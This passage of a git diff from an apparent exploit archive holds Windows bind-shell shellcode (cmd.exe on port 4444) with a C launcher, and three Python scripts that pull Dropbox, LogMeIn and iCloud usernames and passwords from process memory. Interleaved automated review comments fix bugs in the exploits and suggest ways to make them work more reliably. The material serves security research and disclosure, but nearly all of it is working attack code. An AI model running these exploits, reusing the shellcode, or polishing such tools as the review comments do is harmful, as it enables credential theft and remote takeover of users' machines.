f8 add %edi,%eax + 47: 31 c9 xor %ecx,%ecx + 49: 68 6c 6c 41 41 push $0x41416c6c + 4e: 66 89 4c 24 02 mov %cx,0x2(%esp) + 53: 68 33 32 2e 64 push $0x642e3233 + 58: 68 77 73 32 5f push $0x5f327377 + 5d: 8d 1c 24 lea (%esp),%ebx + 60: 53 push %ebx + 61: ff d0 call *%eax + 63: 89 c7 mov %eax,%edi + 65: 8b 5f 3c mov 0x3c(%edi),%ebx + 68: 01 fb add %edi,%ebx + 6a: 8b 5b 78 mov 0x78(%ebx),%ebx + 6d: 01 fb add %edi,%ebx + 6f: 8b 53 1c mov 0x1c(%ebx),%edx + 72: 01 fa add %edi,%edx + 74: 31 c9 xor %ecx,%ecx + 76: 66 b9 c8 01 mov $0x1c8,%cx + 7a: 8b 04 0a mov (%edx,%ecx,1),%eax + 7d: 01 f8 add %edi,%eax + 7f: 89 46 08 mov %eax,0x8(%esi) + 82: 66 b9 88 01 mov $0x188,%cx + 86: 8b 04 0a mov (%edx,%ecx,1),%eax + 89: 01 f8 add %edi,%eax + 8b: 89 46 0c mov %eax,0xc(%esi) + 8e: 8b 42 04 mov 0x4(%edx),%eax + 91: 01 f8 add %edi,%eax + 93: 89 46 10 mov %eax,0x10(%esi) + 96: 8b 42 30 mov 0x30(%edx),%eax + 99: 01 f8 add %edi,%eax + 9b: 89 46 14 mov %eax,0x14(%esi) + 
9e: 8b 02 mov (%edx),%eax + a0: 01 f8 add %edi,%eax + a2: 89 46 18 mov %eax,0x18(%esi) + a5: 8b 42 50 mov 0x50(%edx),%eax + a8: 01 f8 add %edi,%eax + aa: 89 46 1c mov %eax,0x1c(%esi) + ad: 66 b9 90 01 mov $0x190,%cx + b1: 29 cc sub %ecx,%esp + b3: 8d 1c 24 lea (%esp),%ebx + b6: 66 b9 02 02 mov $0x202,%cx + ba: 53 push %ebx + bb: 51 push %ecx + bc: ff 56 08 call *0x8(%esi) + bf: 31 c9 xor %ecx,%ecx + c1: 51 push %ecx + c2: 51 push %ecx + c3: 51 push %ecx + c4: b1 06 mov $0x6,%cl + c6: 51 push %ecx + c7: 83 e9 05 sub $0x5,%ecx + ca: 51 push %ecx + cb: 41 inc %ecx + cc: 51 push %ecx + cd: ff 56 0c call *0xc(%esi) + d0: 89 c7 mov %eax,%edi + d2: 99 cltd + d3: b2 02 mov $0x2,%dl + d5: 52 push %edx + d6: 4a dec %edx + d7: 52 push %edx + d8: 8d 0c 24 lea (%esp),%ecx + db: b2 04 mov $0x4,%dl + dd: 51 push %ecx + de: 52 push %edx + df: 66 ba ff ff mov $0xffff,%dx + e3: 52 push %edx + e4: 57 push %edi + e5: ff 56 1c call *0x1c(%esi) + e8: 99 cltd + e9: 52 push %edx + ea: 52 push %edx + eb: 52 push %edx + ec: 52 push %edx + ed: c6 04 24 02 movb $0x2,(%esp) + f1: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%esp) + f8: 8d 0c 24 lea (%esp),%ecx + fb: b2 10 mov $0x10,%dl + fd: 52 push %edx + fe: 51 push %ecx + ff: 57 push %edi + 100: ff 56 10 call *0x10(%esi) + 103: 99 cltd + 104: 42 inc %edx + 105: 52 push %edx + 106: 57 push %edi + 107: ff 56 14 call *0x14(%esi) + 10a: 99 cltd + 10b: 52 push %edx + 10c: 52 push %edx + 10d: 52 push %edx + 10e: 52 push %edx + 10f: b2 10 mov $0x10,%dl + 111: 8d 0c 24 lea (%esp),%ecx + 114: 52 push %edx + 115: 8d 1c 24 lea (%esp),%ebx + 118: 53 push %ebx + 119: 51 push %ecx + 11a: 57 push %edi + 11b: ff 56 18 call *0x18(%esi) + 11e: 89 c7 mov %eax,%edi + 120: 99 cltd + 121: 83 ec 10 sub $0x10,%esp + 124: 8d 1c 24 lea (%esp),%ebx + 127: 57 push %edi + 128: 57 push %edi + 129: 57 push %edi + 12a: 52 push %edx + 12b: 52 push %edx + 12c: b2 ff mov $0xff,%dl + 12e: 42 inc %edx + 12f: 52 push %edx + 130: 99 cltd + 131: 52 push %edx + 132: 52 push %edx + 133: 
52 push %edx + 134: 52 push %edx + 135: 52 push %edx + 136: 52 push %edx + 137: 52 push %edx + 138: 52 push %edx + 139: 52 push %edx + 13a: 52 push %edx + 13b: b2 44 mov $0x44,%dl + 13d: 52 push %edx + 13e: 8d 0c 24 lea (%esp),%ecx + 141: 99 cltd + 142: 68 65 78 65 41 push $0x41657865 + 147: 88 54 24 03 mov %dl,0x3(%esp) + 14b: 68 63 6d 64 2e push $0x2e646d63 + 150: 8d 04 24 lea (%esp),%eax + 153: 53 push %ebx + 154: 51 push %ecx + 155: 52 push %edx + 156: 52 push %edx + 157: 52 push %edx + 158: 42 inc %edx + 159: 52 push %edx + 15a: 99 cltd + 15b: 52 push %edx + 15c: 52 push %edx + 15d: 50 push %eax + 15e: 52 push %edx + 15f: ff 16 call *(%esi) + 161: 50 push %eax + 162: ff 56 04 call *0x4(%esi) +*/ + + +#include +#include +#include +#include + +char shellcode[]=\ + +"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x78\x10\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x83\xec\x20\x8d\x34\x24\x66\xb9\x94\x02\x8b\x53\x1c\x01\xfa\x8b\x04\x0a\x01\xf8\x89\x06\x66\xb9\x68\x04\x8b\x04\x0a\x01\xf8\x89\x46\x04\x66\xb9\xf0\x0c\x8b\x04\x0a\x01\xf8\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x1c\x24\x53\xff\xd0\x89\xc7\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x53\x1c\x01\xfa\x31\xc9\x66\xb9\xc8\x01\x8b\x04\x0a\x01\xf8\x89\x46\x08\x66\xb9\x88\x01\x8b\x04\x0a\x01\xf8\x89\x46\x0c\x8b\x42\x04\x01\xf8\x89\x46\x10\x8b\x42\x30\x01\xf8\x89\x46\x14\x8b\x02\x01\xf8\x89\x46\x18\x8b\x42\x50\x01\xf8\x89\x46\x1c\x66\xb9\x90\x01\x29\xcc\x8d\x1c\x24\x66\xb9\x02\x02\x53\x51\xff\x56\x08\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x0c\x89\xc7\x99\xb2\x02\x52\x4a\x52\x8d\x0c\x24\xb2\x04\x51\x52\x66\xba\xff\xff\x52\x57\xff\x56\x1c\x99\x52\x52\x52\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x8d\x0c\x24\xb2\x10\x52\x51\x57\xff\x56\x10\x99\x42\x52\x57\xff\x56\x14\x99\x52\x52\x52\x52\xb2\x10\x8d\x0c\x24\x52\x8d\x1c\x24\x53\x51\x57\xff\x56\x18\x89\xc7\x99\x83\xec\x10\x8d\x1c\x24\x57\x57\x57\x52\x52\xb2\xff\x42\x52\x99
\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\xb2\x44\x52\x8d\x0c\x24\x99\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x04\x24\x53\x51\x52\x52\x52\x42\x52\x99\x52\x52\x50\x52\xff\x16\x50\xff\x56\x04"; + +int main(int i,char *a[]) +{ + + int mode; + + + + if(i==1) + mode=1; + else + mode=atoi(a[1]); + +switch(mode) +{ + case 1: + ShellExecute(NULL,NULL,a[0],"78",NULL,0); + break; + + case 78: + (* (int(*)())shellcode )(); + break; + + default: + break; +} + + +return 0; +} diff --git a/platforms/windows/local/40341.txt b/platforms/windows/local/40341.txt deleted file mode 100755 index 7ee6c15d2..000000000 --- a/platforms/windows/local/40341.txt +++ /dev/null 
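Review bot: The header comment of 40352.c lists only the tested Windows editions and omits what the assembly relies on: the API addresses are read from `AddressOfFunctions` at fixed byte offsets (`mov cx,660`, `mov cx,1128`, `mov cx,3312`, and 456/392/4/48/0/80 for ws2_32.dll), so the stubs resolve to the intended functions only on DLL builds whose export ordering matches the tested ones. I would state that in the header, e.g. `# Note : export-table offsets are fixed for the tested kernel32.dll/ws2_32.dll builds; other builds are untested`. The header should also record what an analyst triaging this sample needs, which is currently only in the inline comments: the listener is bound with a zeroed `sin_addr` on TCP port 4444 (`0x5c11`), and `cmd.exe` is started with the accepted socket pushed three times into STARTUPINFOA (the standard-handle slots, as far as the push order shows). In `main`, the result of `ShellExecute` is ignored, so a failed relaunch exits silently with status 0.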
@@ -1,242 +0,0 @@ -##### -# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure -# Tested on Windows Windows Server 2012 R2 64bit, English -# Vendor Homepage @ https://www.dropbox.com -# Date 06/09/2016 -# Bug Discovery by: -# -# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) -# http://www.black-rose.ml -# -# Viktor Minin (https://www.linkedin.com/in/MininViktor) -# https://1-33-7.com/ -# -# Alexander Korznikov (https://www.linkedin.com/in/nopernik) -# http://korznikov.com/ -# -##### -# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. -# A potential attacker could reveal the supplied username and password in order to gain access to account. -##### -# Proof-Of-Concept Code: - -import time -import urllib -from winappdbg import Debug, Process - -username = '' -password = '' -found = 0 -filename = "Dropbox.exe" -process_pid = 0 -memory_dump = [] - -debug = Debug() -try: - print "[~] Searching for pid by process name '%s'.." 
% (filename) - time.sleep(1) - debug.system.scan_processes() - for (process, process_name) in debug.system.find_processes_by_filename(filename): - process_pid = process.get_pid() - if process_pid is not 0: - print "[+] Found process with pid #%d" % (process_pid) - time.sleep(1) - print "[~] Trying to read memory for pid #%d" % (process_pid) - - process = Process(process_pid) - for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'): - memory_dump.append(process.read(address,100)) - for i in range(len(memory_dump)): - email_addr = memory_dump[i].split('email=')[1] - tmp_passwd = memory_dump[i].split('password=')[1] - username = email_addr.split('\x00')[0] - password = tmp_passwd.split('&is_sso_link=')[0] - if username != '' and password !='': - found = 1 - print "[+] Credentials found!\r\n----------------------------------------" - print "[+] Username: %s" % urllib.unquote_plus(username) - print "[+] Password: %s" % password - if found == 0: - print "[-] Credentials not found! Make sure the client is connected." - else: - print "[-] No process found with name '%s'." % (filename) - - debug.loop() -finally: - debug.stop() - - - -###################################################################### - -##### -# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure -# Tested on Windows Windows Server 2012 R2 64bit, English -# Vendor Homepage @ https://secure.logmein.com/home/en -# Date 06/09/2016 -# Bug Discovery by: -# -# Alexander Korznikov (https://www.linkedin.com/in/nopernik) -# http://korznikov.com/ -# -# Viktor Minin (https://www.linkedin.com/in/MininViktor) -# https://1-33-7.com/ -# -# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) -# http://www.black-rose.ml -# -##### -# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. 
-# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers. -##### -# Proof-Of-Concept Code: - -import time -import urllib -from winappdbg import Debug, Process - -username = '' -password = '' -found = 0 -filename = "LMIIgnition.exe" -process_pid = 0 -memory_dump = [] - -debug = Debug() -try: - print "[~] Searching for pid by process name '%s'.." % (filename) - time.sleep(1) - debug.system.scan_processes() - for (process, process_name) in debug.system.find_processes_by_filename(filename): - process_pid = process.get_pid() - if process_pid is not 0: - print "[+] Found process with pid #%d" % (process_pid) - time.sleep(1) - print "[~] Trying to read memory for pid #%d" % (process_pid) - - process = Process(process_pid) - for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'): - memory_dump.append(process.read(address,150)) - for i in range(len(memory_dump[0])): - email_addr = memory_dump[i].split('email=')[1] - tmp_passwd = memory_dump[i].split('password=')[1] - username = email_addr.split('&hiddenEmail=')[0] - password = tmp_passwd.split('&rememberMe=')[0] - if username != '' and password !='': - found = 1 - print "[+] Credentials found!\r\n----------------------------------------" - print "[+] Username: %s" % urllib.unquote_plus(username) - print "[+] Password: %s" % password - break - if found == 0: - print "[-] Credentials not found! Make sure the client is connected." - else: - print "[-] No process found with name '%s'." 
% (filename) - - debug.loop() -finally: - debug.stop() - - - -###################################################################### - -##### -# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit -# Tested on Windows Windows 7 64bit, English -# Vendor Homepage @ https://www.apple.com/ -# Product Homepage @ https://support.apple.com/en-us/HT204283 -# Date 07/09/2016 -# Bug Discovery by: -# -# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) -# http://www.black-rose.ml -# -# Viktor Minin (https://www.linkedin.com/in/MininViktor) -# https://1-33-7.com/ -# -# Alexander Korznikov (https://www.linkedin.com/in/nopernik) -# http://korznikov.com/ -# -##### -# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out. -# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process. -# Funny eh?! -# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account. -# -# Authors are not responsible for any misuse or demage which caused by use of this script code. -# Please use responsibly. 
-##### -# Proof-Of-Concept Code: - -import time -import urllib -from winappdbg import Debug, Process - -def b2h(str): - return ''.join(["%02X " % ord(x) for x in str]).strip() - -def h2b(str): - bytes = [] - str = ''.join(str.split(" ")) - for i in range(0, len(str), 2): - bytes.append(chr(int(str[i:i+2], 16))) - return ''.join(bytes) - -usr = '' -pwd = '' -found = 0 -filename = "iCloud.exe" -process_pid = 0 -memory_dump = [] - -debug = Debug() -try: - print "#########################################################################" - print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#" - print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#" - print "#\t\tTested on Windows Windows 7 64bit, English\t\t#" - print "#\t\t\tPlease use responsibly.\t\t\t\t#" - print "#########################################################################\r\n" - print "[~] Searching for pid by process name '%s'.." % (filename) - time.sleep(1) - debug.system.scan_processes() - for (process, process_name) in debug.system.find_processes_by_filename(filename): - process_pid = process.get_pid() - if process_pid is not 0: - print "[+] Found process with pid #%d" % (process_pid) - time.sleep(1) - print "[~] Trying to read memory for pid #%d" % (process_pid) - - process = Process(process_pid) - for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'): - memory_dump.append(process.read(address,50)) - - try: - str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1] - usr = h2b(str.split(' 00')[0]) - except: - pass - - memory_dump = [] - for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'): - memory_dump.append(process.read(address,60)) - try: - str = b2h(memory_dump[0]).split('07 00 02 09')[1] - pwd = h2b(str.split(' 00')[0]) - except: - pass - - if usr != '' and pwd !='': - found = 1 - print "[+] iCloud Credentials found!\r\n----------------------------------------" - print "[+] 
Username: %s" % usr - print "[+] Password: %s" % pwd - if found == 0: - print "[-] Credentials not found!" - else: - print "[-] No process found with name '%s'." % (filename) - - debug.loop() -finally: - debug.stop() diff --git a/platforms/windows/local/40348.py b/platforms/windows/local/40348.py new file mode 100755 index 000000000..d5faf1120 --- /dev/null +++ b/platforms/windows/local/40348.py 
@@ -0,0 +1,66 @@ +##### +# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure +# Tested on Windows Windows Server 2012 R2 64bit, English +# Vendor Homepage @ https://www.dropbox.com +# Date 06/09/2016 +# Bug Discovery by: +# +# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) +# http://www.black-rose.ml +# +# Viktor Minin (https://www.linkedin.com/in/MininViktor) +# https://1-33-7.com/ +# +# Alexander Korznikov (https://www.linkedin.com/in/nopernik) +# http://korznikov.com/ +# +##### +# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. +# A potential attacker could reveal the supplied username and password in order to gain access to account. +##### +# Proof-Of-Concept Code: + +import time +import urllib +from winappdbg import Debug, Process + +username = '' +password = '' +found = 0 +filename = "Dropbox.exe" +process_pid = 0 +memory_dump = [] + +debug = Debug() +try: + print "[~] Searching for pid by process name '%s'.." 
% (filename) + time.sleep(1) + debug.system.scan_processes() + for (process, process_name) in debug.system.find_processes_by_filename(filename): + process_pid = process.get_pid() + if process_pid is not 0: + print "[+] Found process with pid #%d" % (process_pid) + time.sleep(1) + print "[~] Trying to read memory for pid #%d" % (process_pid) + + process = Process(process_pid) + for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'): + memory_dump.append(process.read(address,100)) + for i in range(len(memory_dump)): + email_addr = memory_dump[i].split('email=')[1] + tmp_passwd = memory_dump[i].split('password=')[1] + username = email_addr.split('\x00')[0] + password = tmp_passwd.split('&is_sso_link=')[0] + if username != '' and password !='': + found = 1 + print "[+] Credentials found!\r\n----------------------------------------" + print "[+] Username: %s" % urllib.unquote_plus(username) + print "[+] Password: %s" % password + if found == 0: + print "[-] Credentials not found! Make sure the client is connected." + else: + print "[-] No process found with name '%s'." % (filename) + + debug.loop() +finally: + debug.stop() \ No newline at end of file diff --git a/platforms/windows/local/40349.py b/platforms/windows/local/40349.py new file mode 100755 index 000000000..c2f25fede --- /dev/null +++ b/platforms/windows/local/40349.py 
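Review bot: `if process_pid is not 0:` compares an int by identity, which only behaves like a value test because CPython caches small integers; it should read `if process_pid != 0:`, and the same line appears in 40349.py and 40350.py. The parsing step indexes `split('email=')[1]` and `split('password=')[1]` without checking that the marker is present in the 100 bytes read, so a search hit that lacks `email=` ends the run with an IndexError instead of reaching the "Credentials not found" message. A guard such as `if 'email=' not in chunk: continue` (with `chunk` bound by `for chunk in memory_dump:`) keeps the failure path on the existing message.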
@@ -0,0 +1,67 @@ +##### +# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure +# Tested on Windows Windows Server 2012 R2 64bit, English +# Vendor Homepage @ https://secure.logmein.com/home/en +# Date 06/09/2016 +# Bug Discovery by: +# +# Alexander Korznikov (https://www.linkedin.com/in/nopernik) +# http://korznikov.com/ +# +# Viktor Minin (https://www.linkedin.com/in/MininViktor) +# https://1-33-7.com/ +# +# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) +# http://www.black-rose.ml +# +##### +# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. +# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers. +##### +# Proof-Of-Concept Code: + +import time +import urllib +from winappdbg import Debug, Process + +username = '' +password = '' +found = 0 +filename = "LMIIgnition.exe" +process_pid = 0 +memory_dump = [] + +debug = Debug() +try: + print "[~] Searching for pid by process name '%s'.." 
% (filename) + time.sleep(1) + debug.system.scan_processes() + for (process, process_name) in debug.system.find_processes_by_filename(filename): + process_pid = process.get_pid() + if process_pid is not 0: + print "[+] Found process with pid #%d" % (process_pid) + time.sleep(1) + print "[~] Trying to read memory for pid #%d" % (process_pid) + + process = Process(process_pid) + for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'): + memory_dump.append(process.read(address,150)) + for i in range(len(memory_dump[0])): + email_addr = memory_dump[i].split('email=')[1] + tmp_passwd = memory_dump[i].split('password=')[1] + username = email_addr.split('&hiddenEmail=')[0] + password = tmp_passwd.split('&rememberMe=')[0] + if username != '' and password !='': + found = 1 + print "[+] Credentials found!\r\n----------------------------------------" + print "[+] Username: %s" % urllib.unquote_plus(username) + print "[+] Password: %s" % password + break + if found == 0: + print "[-] Credentials not found! Make sure the client is connected." + else: + print "[-] No process found with name '%s'." % (filename) + + debug.loop() +finally: + debug.stop() \ No newline at end of file diff --git a/platforms/windows/local/40350.py b/platforms/windows/local/40350.py new file mode 100755 index 000000000..5a5f66fbe --- /dev/null +++ b/platforms/windows/local/40350.py 
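Review bot: `for i in range(len(memory_dump[0])):` takes its bound from the length of the first 150-byte read rather than from the number of reads, and then indexes `memory_dump[i]`. With no search hit `memory_dump[0]` raises IndexError, and when no entry yields a non-empty username and password the loop runs past the end of the list, so the "Credentials not found" branch is not reached in either case. 40348.py uses `range(len(memory_dump))` for the same step; iterating the list directly, `for dump in memory_dump:`, avoids the index altogether.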
@@ -0,0 +1,99 @@ +##### +# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit +# Tested on Windows Windows 7 64bit, English +# Vendor Homepage @ https://www.apple.com/ +# Product Homepage @ https://support.apple.com/en-us/HT204283 +# Date 07/09/2016 +# Bug Discovery by: +# +# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) +# http://www.black-rose.ml +# +# Viktor Minin (https://www.linkedin.com/in/MininViktor) +# https://1-33-7.com/ +# +# Alexander Korznikov (https://www.linkedin.com/in/nopernik) +# http://korznikov.com/ +# +##### +# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out. +# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process. +# Funny eh?! +# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account. +# +# Authors are not responsible for any misuse or demage which caused by use of this script code. +# Please use responsibly. 
+##### +# Proof-Of-Concept Code: + +import time +import urllib +from winappdbg import Debug, Process + +def b2h(str): + return ''.join(["%02X " % ord(x) for x in str]).strip() + +def h2b(str): + bytes = [] + str = ''.join(str.split(" ")) + for i in range(0, len(str), 2): + bytes.append(chr(int(str[i:i+2], 16))) + return ''.join(bytes) + +usr = '' +pwd = '' +found = 0 +filename = "iCloud.exe" +process_pid = 0 +memory_dump = [] + +debug = Debug() +try: + print "#########################################################################" + print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#" + print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#" + print "#\t\tTested on Windows Windows 7 64bit, English\t\t#" + print "#\t\t\tPlease use responsibly.\t\t\t\t#" + print "#########################################################################\r\n" + print "[~] Searching for pid by process name '%s'.." % (filename) + time.sleep(1) + debug.system.scan_processes() + for (process, process_name) in debug.system.find_processes_by_filename(filename): + process_pid = process.get_pid() + if process_pid is not 0: + print "[+] Found process with pid #%d" % (process_pid) + time.sleep(1) + print "[~] Trying to read memory for pid #%d" % (process_pid) + + process = Process(process_pid) + for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'): + memory_dump.append(process.read(address,50)) + + try: + str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1] + usr = h2b(str.split(' 00')[0]) + except: + pass + + memory_dump = [] + for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'): + memory_dump.append(process.read(address,60)) + try: + str = b2h(memory_dump[0]).split('07 00 02 09')[1] + pwd = h2b(str.split(' 00')[0]) + except: + pass + + if usr != '' and pwd !='': + found = 1 + print "[+] iCloud Credentials found!\r\n----------------------------------------" + print "[+] 
Username: %s" % usr + print "[+] Password: %s" % pwd + if found == 0: + print "[-] Credentials not found!" + else: + print "[-] No process found with name '%s'." % (filename) + + debug.loop() +finally: + debug.stop() \ No newline at end of file
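Review bot: Both parsing steps are wrapped in a bare `except: pass`, which also swallows KeyboardInterrupt and any winappdbg error, so a failed read is indistinguishable from "no credentials present"; `except IndexError:` covers the case the code appears to expect (`memory_dump[0]` or `split(...)[1]` missing). `b2h` and `h2b` name their parameter `str`, `h2b` uses a local `bytes`, and the main block later assigns `str = ...`, which shadows the builtin for the rest of the script; names such as `data` and `hex_text` avoid that. `import urllib` is unused in this file, unlike in 40348.py and 40349.py.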